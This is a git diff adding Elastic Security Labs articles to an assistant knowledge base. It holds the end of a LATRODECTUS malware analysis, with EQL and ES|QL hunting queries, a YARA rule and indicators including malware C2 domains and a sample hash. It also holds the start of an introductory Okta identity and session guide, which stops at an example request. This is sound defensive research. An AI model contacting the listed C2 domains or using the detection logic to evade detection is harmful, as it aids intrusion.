+| [T1059.003 - Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) | [Command Shell Activity Started via RunDLL32](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_command_shell_activity_started_via_rundll32.toml) | LATRODECTUS Command ID (4) - Collect system information via a series of cmd.exe execution. |
+
+The following list of hunts and detection queries can be used to detect LATRODECTUS post-exploitation commands focused on execution:
+
+**Rundll32 Download PE/DLL** (command handlers #12, #13 and #18): 
+
+``` sql
+sequence by process.entity_id with maxspan=1s
+[file where event.action == "creation" and process.name : "rundll32.exe" and 
+ /* PE file header dropped to the InetCache folder */
+file.Ext.header_bytes : "4d5a*" and file.path : "?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*"]
+[network where process.name : "rundll32.exe" and 
+   event.action : ("disconnect_received", "connection_attempted") and 
+   /* network disconnect activity to a public Ip address */
+   not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", "FF00::/8", "192.168.0.0/16")]
+```
+
+![EQL Query using hunt detecting LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image8.png)
+
+
+Below is an ES|QL hunt to look for long-term and/or high count of network connections by rundll32 to a public IP address (which is uncommon): 
+
+``` sql
+from logs-endpoint.events.network-*
+| where host.os.family == "windows" and event.category == "network" and
+ network.direction == "egress" and process.name == "rundll32.exe" and
+/* excluding private IP ranges */
+ not CIDR_MATCH(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1","FE80::/10", "FF00::/8")
+| keep source.bytes, destination.address, process.name, process.entity_id, process.pid, @timestamp, host.name
+/* calc total duration and the number of connections per hour */
+| stats count_connections = count(*), start_time = min(@timestamp), end_time = max(@timestamp) by process.entity_id, process.pid, destination.address, process.name, host.name
+| eval duration = TO_DOUBLE(end_time)-TO_DOUBLE(start_time), duration_hours=TO_INT(duration/3600000), number_of_con_per_hour = (count_connections / duration_hours)
+| keep host.name, destination.address, process.name, process.pid, duration, duration_hours, number_of_con_per_hour, count_connections
+| where count_connections >= 100
+```
+
+![ES|QL Query using hunt detecting LATRODECTUS](/assets/images/spring-cleaning-with-latrodectus/image3.png)
+
+
+Below is a screenshot of Elastic Defend triggering on the LATRODECTUS [memory signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar):   
+
+![Memory signatures against LATRODECTUS via Elastic Defend](/assets/images/spring-cleaning-with-latrodectus/image23.png)
+
+
+### YARA
+
+Elastic Security has created YARA rules to identify [LATRODECTUS](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar):
+
+```
+rule Windows_Trojan_LATRODECTUS_841ff697 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-03-13"
+        last_modified = "2024-04-05"
+        license = "Elastic License v2"
+         os = "Windows"
+        arch = "x86"
+        threat_name = "Windows.Trojan.LATRODECTUS"
+        reference_sample = "aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c"
+
+
+    strings:
+        $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 }
+        $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 00 C3 }
+        $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 00 B8 FF FF FF FF E9 A6 00 }
+        $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44 24 44 83 7C 24 44 00 75 02 EB 11 48 8B 44 24 48 EB 0C 33 C0 85 C0 0F 85 10 FE FF FF 33 }
+        $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC 24 D8 01 00 00 0D 74 18 83 BC 24 D8 01 00 00 0F 74 0E 83 BC 24 D8 01 00 00 04 0F 85 44 02 00 00 }
+        $hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 }
+        $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 89 44 24 ?? 33 C0 66 89 44 24 ?? EB ?? }
+        $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01 89 04 24 EB BE }
+    condition:
+        2 of them
+}
+```
+
+## Observations
+
+The following observables were discussed in this research.
+
+| Observable | Type | Name | Reference |
+| --- | --- | --- | --- |
+| aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c | SHA-256 | TRUFOS.DLL | LATRODECTUS |
+| aytobusesre.com | domain | | LATRODECTUS C2 |
+| scifimond.com | domain | | LATRODECTUS C2 |
+| gyxplonto.com | domain | | ICEDID C2 |
+| neaachar.com | domain | | ICEDID C2 |
+
+## References
+The following were referenced throughout the above research:
+
+ - [https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39)
+ - [https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice)
+
+## Tooling
+[String decryption and IDA commenting tool](https://github.com/elastic/labs-releases/blob/main/tools/latrodectus/latro_str_decrypt.py)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/starter_guide_to_understanding_okta.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/starter_guide_to_understanding_okta.md
new file mode 100644
index 0000000000000..0b3d85ba021f4
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/starter_guide_to_understanding_okta.md
@@ -0,0 +1,423 @@
+---
+title: "Starter guide to understanding Okta"
+subtitle: "An introduction for security analysts"
+slug: "starter-guide-to-understanding-okta"
+date: "2024-01-23"
+description: "This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments."
+author:
+  - slug: terrance-dejesus
+image: "photo-edited-09.png"
+category:
+  - slug: security-research
+---
+
+# Preamble
+The evolution of digital authentication from simple, unencrypted credentials to today’s advanced methods underscores the importance of data security. As organizations adapt to hybrid deployments and integral application access is no longer within the perimeter of a network, inherited authentication complexity and risk ensue. The adoption of standard authentication protocols and advanced workflows is mandatory to not only reduce risk but also maintain operational stability amongst users who require access to various applications. Okta provides solutions to these inherent industry problems with its comprehensive SaaS platform for Identity and Access Management (IAM) services.
+
+We will examine Okta's services and solutions in the context of Software-as-a-Service (SaaS) platforms and against the backdrop of the broader threat landscape. We'll explore historical and potential vulnerabilities to understand their origins and impacts. This article will provide insights into:
+
+ - Universal Directory (UD)
+ - Data Model
+ - API Access Management
+ - Access Policies
+ - Session Management
+ - Tenants
+ - Authorization Workflows
+ - Authentication Workflows.
+
+With a deeper understanding of Okta, security practitioners may leverage this knowledge to accurately assess attack surfaces where Okta is deployed.
+
+# Okta's offerings
+
+## Overview of core services
+
+In this introduction, we delve into the core services provided by Okta. Primarily, Okta is a SaaS platform, specializing in scalable Identity and Access Management (IAM) solutions. Central to its offerings are technologies such as Single Sign-On (SSO), Multi-Factor Authentication (MFA), and support for complex multi-tenant architectures. Okta also boasts a robust suite of RESTful APIs, facilitating seamless Create, Read, Update, and Delete (CRUD) operations.
+
+At the heart of Okta’s IAM solutions lie users, groups, and policies. The platform provides comprehensive lifecycle management and a UD, allowing seamless IAM across hybrid environments encompassing applications, devices, and more. This includes synchronization capabilities with external directories like LDAP or Active Directory (AD), ensuring a unified identity management system.
+
+A key aspect of Okta's service is its dual role as both a Service Provider (SP) and an Identity Provider (IdP). This dual functionality enables Okta to facilitate secure and seamless authentication via its [Identity Engine](https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-index.htm), and robust authorization using standard protocols such as OAuth, while also supporting authentication protocols such as Security Assertion Markup Language (SAML) and OpenID Connect (OIDC).
+
+For customers, Okta offers valuable tools for security and compliance. [System logs](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/), environment-based events that are stored and retrievable via API, provide insights into user activities and organizational events. These logs are crucial for Security Information and Event Management (SIEM) systems, aiding in the detection of anomalies and potential threats.
+
+Additionally, Okta's [ThreatInsight](https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm) feature stands out as a proactive security measure. It aggregates and analyzes system logs, dynamically identifying and responding to potential threats. This includes recognizing patterns indicative of malicious activities such as password spraying, credential stuffing, and detecting suspicious IP addresses. These features collectively enhance the security posture of organizations, fortifying them against a wide array of cyber threats.
+
+## Integration capabilities
+
+Aside from some of the many offerings, Okta is very developer-friendly with various other SaaS solutions and applications. Out of the box, Okta contains an [integration network](https://www.okta.com/integrations/) that allows seamless integration with other applications such as Slack, Google Workspace, Office 365, GitHub, and many more.
+
+Okta’s [RESTful APIs](https://developer.okta.com/docs/reference/core-okta-api/) follow the System for Cross-domain Identity Management ([SCIM](https://datatracker.ietf.org/doc/html/rfc7644)) protocol. This allows for straightforward Create, Read, Update, and Delete (CRUD) operations on users and groups by applications or developers, but also enables standardization within the SaaS ecosystem. SCIM is a pivotal component of Okta's scalability. As businesses expand, the need to integrate an increasing number of users, groups, and access controls across various SaaS platforms grows. SCIM addresses this challenge by standardizing how user identity data is communicated between these platforms. This standardization facilitates the process of user management, especially in synchronizing user information across different systems.
+
+Okta’s object management regarding APIs is focused on several domains listed below:
+
+ - Apps API - Manage applications and their association with users and groups.
+ - Users API - CRUD operations on users.
+ - Sessions API - Creates and manages user’s authentication sessions.
+ - Policy API - Creates and manages settings such as a user’s session lifetime.
+ - Factors API - Enroll, manage, and verify factors for MFA.
+ - Devices API - Manage device identity and lifecycles.
+
+When integrations are added to an Okta organization, authentication policies, both fine-grained and global, can be set up for access control based on end-user attributes stored within the user’s Okta profile.
+
+# Universal directory
+
+At the core of Okta’s user, group, policy, and device management is the [UD](https://www.okta.com/products/universal-directory). This is a single pane view of all assets, whether sourced from Okta, an integration, or a secondary directory service such as AD.
+
+The UD is technically an Okta-managed, centralized, and cloud-based repository for all user, group, device, and policy profiles. Okta is either the source of truth regarding IAM or synchronizes with other federation services and identity providers such as AD or Google Workspace. The UD is accessible behind Okta’s core APIs for CRUD operations and used in conjunction with their single sign-on (SSO) platform, thus providing authentication and authorization to linked integrations or the admin console itself. Everything from user management to streamlined password management is enabled by the UD.
+
+In conclusion, the UD classifies as a directory-as-a-service ([DaaS](https://jumpcloud.com/daas-glossary/directory-as-a-service-daas)), similar to AWS directory service, Microsoft’s Entra ID and many more.
+
+## Customization and management
+
+Adding a bit more depth to the UD, profile customization is accessible. This enables an organization to store a record of information regarding users and groups that contain specific attributes. Base attributes are assigned by Okta, but custom attributes can be added as well between user, group, and app [user profiles](https://developer.okta.com/docs/concepts/user-profiles/). Attribute mappings are important for synchronization and data exchanges between integrations and other directory services. For example, the AD attribute givenName can be mapped specifically to FirstName and LastName in Okta. Aside from synchronization, this is important for other Okta-related features such as [inline hooks](https://developer.okta.com/docs/concepts/inline-hooks/), directory rules and actions, and more.
+
+Additionally, this enables rich SAML assertions and [WS-Federation](https://auth0.com/docs/authenticate/protocols/ws-fed-protocol) claims where applications can utilize this information to create rich user accounts, update accounts, or create complex authorization and authentication decisions.
+
+There are additional [autonomous provisioning and deprovisioning](https://help.okta.com/en-us/content/topics/provisioning/lcm/con-okta-prov.htm) options available as well with the UD and internal profiles, important for scalability and administrative tasks such as controlling which user types can access which applications, thus enabling more traditional role-based access control (RBAC) policies.
+
+## Integration with external directories
+
+As mentioned previously, the Okta [Directory Integration](https://www.okta.com/resources/whitepaper/ad-architecture/) can synchronize with external directories such as LDAP, AD, Google Workspace and others. For cloud-based DaaS platforms, Okta leverages RESTful APIs and the SCIM protocol to perform data exchanges and more. For on-premise environments, Okta has an AD [endpoint agent](https://help.okta.com/en-us/content/topics/directory/ad-agent-new-integration.htm) that can be deployed and thus pulls information from directory services and ships it back to the UD. 
+
+Alternatively, Desktop SSO (DSSO) provides an [agentless](https://help.okta.com/en-us/content/topics/directory/configuring_agentless_sso.htm) option as well. This supplies flexibility to cloud, on-premise or hybrid based environments all while continuing scalability and direct integration with 3rd-party applications. Architecturally, this solves the many pitfalls of LAN-based environments, where applications are served to domain users behind a firewall. From a security perspective, credentials and profiles are then synchronized from all application directories into a single “source-of-truth”: Okta. It is much more approachable to audit a single directory as well in an instance where, for example, a disgruntled employee is no longer employed, and thus access across various applications must be deactivated. Single Log-Off ([SLO](https://help.okta.com/en-us/content/topics/apps/apps_single_logout.htm)) is thus available for such situations thanks to these external directory integration capabilities.
+
+Finally, we must not overlook the amount of maintenance this potentially reduces for organizations who may not have the resources to manage SAML, OAuth, and SCIM communications between RESTful APIs or compatibility issues between integrations as Okta manages this for them.
+
+Additional solutions and examples of Okta providers with external directory support for AD can be found [here](https://www.okta.com/resources/whitepaper/ad-architecture/).
+
+# Data model
+
+As we traverse through the Okta landscape, understanding Okta’s [data models](https://developer.okta.com/docs/concepts/okta-data-model/) is important to security practitioners who may be tasked with threat hunting, detection logic, and more.
+
+## Structure and design
+
+When Okta is first established for an organization, it inherits its own “space” where applications, directories, user profiles, authentication policies, and more are housed. A top-level directory resource is given as a “base” for your organization where entities can be sourced from Okta or externally (LDAP, AAD, Google Workspace, etc.).
+
+Okta users are higher-privileged users who typically leverage the Okta [admin console](https://help.okta.com/en-us/content/topics/dashboard/dashboard.htm) and perform administrative tasks, while end users are those who may rely on Okta for SSO, access to applications and more.
+
+By default, entities in Okta are referred to as resources. Each resource has a combined set of default and custom attributes as discussed before. Links then describe relationships or actions that are acceptable for a resource, such as a deactivation link. This information is then aggregated into a profile which is then accessible from within the UD. Groups are made up of users more as a label to a specific set of users.
+
+Applications hold information about policies for access related to users and groups, as well as how to communicate with each integrated application. Together, the data stored about application access and related users is stored as an [AppUser](https://support.okta.com/help/s/article/The-Okta-User-Profile-And-Application-User-Profile?language=en_US) and if mapping is done correctly between directories, enables access for end users.
+
+A policy contains a set of conditions and rules that affect how an organization behaves with applications and users. Policies are all-encompassing in Okta, meaning they are used for making decisions and completing actions such as - what is required for a password reset or how to enroll in MFA. These rules can be expressed using the Okta Expression Language ([OEL](https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/)).
+
+Dedicated [authorization servers](https://developer.okta.com/docs/concepts/auth-servers/) are used per organization to provide authorization codes and tokens for access to applications by API or resources. Here, authorization and authentication protocols such as OAuth, OIDC, and SAML are vital for workflows. These authorization servers are also responsible for communication with third-party IdPs such as Google Workspace. End users who may seek access to applications are entangled in communication between authorization servers and SPs as codes and tokens are exchanged rapidly to confirm authorization and authentication.
+
+Altogether, this structure and design support scalability, customization, and seamless integration.
+
+# API access management
+
+API access management is not only important for end users, administrators, and developers but also for integration-to-integration communication. Remember that at the forefront of Okta are its various RESTful [API endpoints](https://developer.okta.com/docs/reference/core-okta-api/#manage-okta-objects).
+
+While we won’t dive deep into the design principles and object management of Okta’s APIs, we will attempt to discuss core concepts that are important for understanding attack surfaces later in this blog series.
+
+## API Security
+
+### OAuth 2.0 and OIDC implementation
+
+Understanding the core protocols of [OAuth](https://auth0.com/docs/authenticate/protocols/oauth) and [OIDC](https://auth0.com/docs/authenticate/protocols/openid-connect-protocol) is key before exploring various authorization and authentication workflows. OAuth, an open standard for delegated authorization in RESTful APIs, operates over HTTPS, enabling secure, delegated access using access tokens instead of credentials. These tokens, cryptographically signed by the Identity Provider (IdP), establish a trust relationship, allowing applications to grant user access. The typical OAuth workflow involves user access requests, user authentication, proof-of-authorization code delivery, and token issuance for API requests. Access tokens are verified with the IdP to determine access scope.
+
+OIDC ([API endpoints](https://developer.okta.com/docs/reference/api/oidc/#endpoints)) builds upon OAuth for authentication, introducing identity-focused scopes and an ID token in addition to the access token. This token, a JSON Web Token ([JWT](https://developer.okta.com/blog/2020/12/21/beginners-guide-to-jwt)), contains identity information and a signature, crucial for SSO functionality and user authentication. Okta, as a certified OIDC provider, leverages these endpoints, especially when acting as an authorization server for Service Providers (SPs).
+
+Demonstrating Proof-of-Possession ([DPoP](https://developer.okta.com/docs/guides/dpop/main/#oauth-2-0-dpop-jwt-flow)) is crucial in this context, enhancing security by preventing misuse of stolen tokens through an application-level mechanism. It involves a public/private key pair where the public key, embedded in a JWT header, is sent to the authorization server. The server binds this public key to the access token, ensuring secure communication primarily between the user’s browser and the IdP or SP.
+
+[Tokens](https://developer.okta.com/docs/guides/tokens/) and API keys in Okta’s API Access Management play a vital role, acting as digital credentials post-user authentication. They are transmitted securely via HTTPS and have a limited lifespan, contributing to a scalable, stateless architecture.
+
+Lastly, understanding End-to-End Encryption (E2EE) is essential. E2EE ensures that data is encrypted at its origin and decrypted only by the intended recipient, maintaining security and privacy across the ecosystem. This encryption, using asymmetric cryptography, is a default feature within Okta’s APIs, safeguarding data across applications, browsers, IdPs, and SPs.
+
+## RESTful API and CRUD
+
+Okta's RESTful API adheres to a standardized interface design, ensuring uniformity and predictability across all interactions. This design philosophy facilitates CRUD (Create, Read, Update, Delete) operations, making it intuitive for developers to work with Okta's API. Each [API endpoint](https://developer.okta.com/docs/reference/core-okta-api/) corresponds to standard HTTP methods — POST for creation, GET for reading, PUT for updating, and DELETE for removing resources. This alignment with HTTP standards simplifies integration and reduces the learning curve for new developers.
+
+A key feature of Okta providing a RESTful API is its statelessness — each request from client to server must contain all the information needed to understand and complete the request, independent of any previous requests. This approach enhances scalability, as it allows the server to quickly free resources and not retain session information between requests. The stateless nature of the API facilitates easier load balancing and redundancy, essential for maintaining high availability and performance even as demand scales.
+
+## SCIM
+
+SCIM (System for Cross-domain Identity Management) is an open standard that automates user identity management across various cloud-based applications and services. Integral to Okta's API Access Management, SCIM ensures seamless, secure user data exchange between Okta and external systems. It standardizes identity information, which is essential for organizations using multiple applications, reducing complexity and manual error risks.
+
+Within Okta, SCIM’s role extends to comprehensive user and group management, handling essential attributes like usernames, emails, and group memberships. These are key for access control and authorization. Okta’s SCIM implementation is customizable, accommodating the diverse identity management needs of different systems. This adaptability streamlines identity management processes, making them more automated, efficient, and reliable - crucial for effective API access management.
+
+More information on SCIM can be found in [RFC 7644](https://datatracker.ietf.org/doc/html/rfc7644) or by [Okta](https://developer.okta.com/docs/concepts/scim/#how-does-scim-work).
+
+## Access policies
+
+Okta's [access policies](https://developer.okta.com/docs/concepts/policies/) play a critical role in managing access to applications and APIs. They can be customized based on user/group membership, device, location, or time, and can enforce extra authentication steps for sensitive applications. These policies, stored as JSON in Okta, allow for:
+
+ - Creating complex authorization rules.
+ - Specifying additional authentication levels for Okta applications.
+ - Managing user access and modifying access token scopes with inline hooks.
+
+Key Policy Types in Okta include:
+
+ - *Sign-On Policies*: Control app access with IF/THEN rules based on context, like IP address.
+ - *Global Session Policy*: Manages access to Okta, including factor challenges and session duration.
+ - *Authentication Policy*: Sets extra authentication requirements for each application.
+ - *Password Policy*: Defines password requirements and recovery operations.
+ - *Authenticator Enrollment Policy*: Governs multifactor authentication method enrollment.
+ 
+ Policy effectiveness hinges on their sequential evaluation, applying configurations when specified conditions are met. The evaluation varies between the AuthN and Identity Engine pipelines, with the latter considering both global session and specific authentication policies.
+
+Additionally, [Network Zones](https://help.okta.com/en-us/content/topics/security/network/network-zones.htm) in Okta enhances access control by managing it based on user connection sources. These zones, allowing for configurations based on IP addresses and geolocations, integrate with access policies to enforce varied authentication requirements based on network origin. This integration bolsters security and aids in monitoring and threat assessment.
+
+# Session management
+
+In web-based interactions involving Identity Providers (IdPs) like Okta and Service Providers (SPs), the concept of a session is central to the user experience and security framework. A session is typically initiated when an end-user starts an interaction with an IdP or SP via a web browser, whether this interaction is intentional or inadvertent.
+
+Technically, a session represents a state of interaction between the user and the web service. Unlike a single request-response communication, a session persists over time, maintaining the user's state and context across multiple interactions. This persistence is crucial, as it allows the user to interact with web services without needing to authenticate for each action or request after the initial login.
+
+A session can hold a variety of important data, which is essential for maintaining the state and context of the user's interactions. This includes, but is not limited to:
+
+*Cookies*: These are used to store session identifiers and other user-specific information, allowing the web service to recognize the user across different requests.
+
+*Tokens*: Including access, refresh, and ID tokens, these are critical for authenticating and authorizing the user, and for maintaining the security of their interactions with the web service.
+
+*User Preferences and Settings*: Customizations or preferences set by the user during their interaction.
+
+*Session Expiration Data*: Information about when the session will expire or needs to be refreshed. This is vital for security, ensuring that sessions don’t remain active indefinitely, which could pose a security risk.
+
+The management of sessions, particularly their creation, maintenance, and timely expiration is a crucial aspect of web-based services. Effective session management ensures a balance between user convenience — by reducing the need for repeated logins — and security — by minimizing the risk of unauthorized access through abandoned or excessively long-lived sessions. In the interactions between the end-user, IdP, and SP, sessions facilitate a seamless yet secure flow of requests and responses, underpinning the overall security and usability of the service.
+
+### Session initialization and authentication:
+
+Okta manages [user sessions](https://developer.okta.com/docs/concepts/session/) beginning with the IdP session, which is established when a user successfully authenticates using their credentials, and potentially multi-factor authentication (MFA). This IdP session is key to accessing various applications integrated into an organization's Okta environment. For instance, an HTTP POST request to Okta's ```/api/v1/authn``` endpoint initiates this session by validating the user's credentials. In addition, the [Sessions endpoint API](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/) can help facilitate creation and management at ```/api/v1/sessions```.
+
+Okta primarily uses cookies for session management, specifically in the context of identity provider (IdP) sessions. These cookies are crucial for maintaining the session state and user context across HTTP requests within the Okta environment. A typical session cookie retrieval for the end-user’s browser goes as follows:
+
+ 1. IdP or SP-initiated application access request
+ 2. Authentication request either via OIDC or SAML
+ 3. After successful credential validation, a session token is returned
+ 4. Redirection to OIDC endpoint, session redirection, or application embed link for session cookie
+
+As detailed, when a user successfully authenticates, Okta ultimately sets a session cookie in the user’s browser. This cookie is then used to track the user session, allowing for seamless interaction with various applications without the need for re-authentication.
+
+### Tokens vs cookies:
+
+While Okta utilizes tokens like ID and access tokens for API access and authorization, these tokens serve a different purpose from session cookies. Tokens are typically used in API interactions and are not responsible for maintaining the user’s session state. In contrast, session cookies are specifically designed for maintaining session continuity within the web browser, making them essential for web-based SSO and session management within Okta.
+
+Session tokens are similar to client-side secrets, just like authorization codes during authorization requests. These secrets, along with the correct requests to specific API endpoints can allow an end-user, or adversary, to obtain a session cookie or access token which can then be used to make authenticated/authorized requests on behalf of the user. This should warrant increased security measures for session management and monitoring.
+
+### Single sign-on (SSO):
+
+[SSO](https://www.okta.com/blog/2021/02/single-sign-on-sso/) is a critical feature in Okta's session management, allowing users to access multiple applications with a single set of credentials. This is achieved through protocols like SAML and OIDC, where an HTTP(S) request to the SAML endpoint, for instance, facilitates user authentication and grants access across different applications without the need for repeated logins.
+
+In Single Sign-On (SSO) scenarios, Okta’s session cookies play a vital role. Once a user is authenticated and a session is established, the same session cookie facilitates access to multiple applications within the SSO framework by bundled with every service provider request. This eliminates the need for the user to log in separately to each application, streamlining the user experience.
+
+### Session termination:
+
+Terminating a session in Okta can occur due to expiration. This can also occur from a user, SP, or IdP-initiated sign-out. An HTTP GET request to Okta's ```/api/v1/sessions/me``` endpoint can be used to terminate the user’s session. In the case of SSO, this termination can trigger a single logout (SLO), ending sessions across all accessed applications.
+
+### Application sessions and additional controls:
+
+Application sessions are specific to the application a user accesses post-authentication with the IdP. Okta allows fine-grained control over these sessions, including different expiration policies for privileged versus non-privileged applications. Additionally, administrators can implement policies for single logout ([SLO](https://support.okta.com/help/s/article/What-SLO-does-and-doesnt-do?language=en_US)) or local logout to further manage session lifecycles.
+
+Understanding the mechanics of session initiation, management, and termination, as well as the role of tokens and cookies, is foundational for exploring deeper security topics. This knowledge is crucial when delving into areas like attack analysis and session hijacking, which will be discussed in later parts of this blog series.
+
+More information on sessions can be found in [Session management with Okta](https://developer.okta.com/docs/concepts/session/#application-session) or [Sessions for Developers](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/).
+
+# Tenants
+
+In the SaaS realm, a [tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) is a distinct instance of software and infrastructure serving a specific user group. In Okta's [multi-tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) platform, this concept is key for configuring access control. Tenants can represent various groups, from internal employees to external contractors, each requiring unique access to applications. This is managed through Okta, serving as the IdP.
+
+Tenants are versatile within Okta: they can be tailored based on security policies, user groups, roles, and profiles, allowing them to operate independently within the organization. This independence is crucial in multi-tenant environments, where distinct tenants are segregated based on factors like roles, data privacy, and regulatory requirements. Such setups are common in Okta, enabling users to manage diverse access needs efficiently.
+
+In multi-org environments, Okta facilitates tenants across separate organizations through its UD. The configuration of each tenant is influenced by various factors including cost, performance, and data residency, with user types and profiles forming the basis of tenant setup. Additionally, features like delegated admin support and DNS customization for post-sign-in redirects are instrumental in managing tenant access.
+
+Understanding the nuances of tenant configuration in Okta is vital, not only for effective administration but also for comprehending potential security challenges, such as the risk of [poisoned tenants](https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md).
+
+# Authorization workflow
+
+As we discussed earlier, Okta - being an IdP - provides an authorization server as part of its services. It is critical to understand the authorization workflow that happens on the front and back-end channels. For this discussion and examples, we will use the client (end-user), authorization server (Okta), and SP (application server) as the actors involved.
+
+## OAuth 2.0 and OIDC protocols
+
+### High-level overview of OAuth
+
+OAuth 2.0, defined in [RFC 6749](https://datatracker.ietf.org/doc/html/rfc6749), is a protocol for authorization. It enables third-party applications to gain limited access approved by the end-user or resource owner. Operating over HTTPS, it grants access tokens to authorize users, devices, APIs, servers, and applications.
+
+Key OAuth terminology:
+
+[Scopes](https://www.oauth.com/oauth2-servers/scope/defining-scopes/): Define the permissions granted within an access token. They represent session permissions for each interaction with a resource server.
+
+Consent: A process where end users or clients agree or disagree with the permissions (scopes) requested by a client application. For example, a consent screen in Google Workspace.
+
+[Tokens](http://Tokens): Includes access tokens for resource access and refresh tokens for obtaining new access tokens without re-authorizing.
+
+[Grants](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): Data sent to the authorization server to receive an access token, like an authorization code granted post-authentication.
+
+[Clients](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): In OAuth, clients are either 'confidential', able to securely store credentials, or 'public', which cannot.
+
+Authorization Server: Mints OIDC and OAuth tokens and applies access policies, each with a unique URI and signing key.
+
+[Authorization Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/authorize) for user interaction and authorization.
+
+[Token Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/token) for clients to obtain access or refresh tokens, typically requiring a grant type like authorization code.
+
+Resource Server (or Service Provider, SP): Provides services to authenticated users, requiring an access token.
+
+Front-end Channel: Communication between the user’s browser and the authorization or resource server.
+
+Back-end Channel: Machine-to-machine communication, such as between resource and authorization servers.
+
+This streamlined overview covers the essentials of OAuth in the Okta ecosystem, focusing on its function, key terms, and components.
+
+### High-level overview of OIDC
+
+At the beginning of this blog, we also discussed how [OIDC](https://openid.net/specs/openid-connect-core-1_0.html) is an identity authentication protocol that sits on top of the OAuth authorization framework. While OAuth provides authorization, it has no current mechanism for authentication, thus where OIDC protocol comes in handy. The identity of the authenticated user is often called the resource owner.
+
+The OIDC connect flow looks similar to the OAuth flow, however during the initial HTTPS request, scope=openid is added to be used so that not only an access token is returned from the authorization server but an ID token as well.
+
+The ID token is formatted as a JSON Web Token (JWT) so that the client can extract information about the identity. This is unlike the access token, which the client passes to the resource server every time access is required. Data such as expiration, issuer, signature, email, and more can be found inside the JWT - these are also known as claims.
+
+## Authorization code flow
+
+### Step 1 - Initial authorization request:
+
+The authorization code flow is initiated when the client sends an HTTP GET request to Okta’s authorization endpoint. This request is crucial in establishing the initial part of the OAuth 2.0 authorization framework.
+
+Here’s a breakdown of the request components:
+
+ - Endpoint: The request is directed to ```/oauth2/default/v1/authorize```, which is Okta’s authorization endpoint
+ - Parameters:
+   - ```response_type=code```: This parameter specified that the application is initiating an authorization code grant type flow.
+   - ```client_id```: The unique identifier for the client application registered with Okta.
+   - ```redirect_uri```: The URL to which Okta will send the authorization code.
+   - ```scope```: Defines the level of access the application is requesting.
+
+Example Request:
+
+```
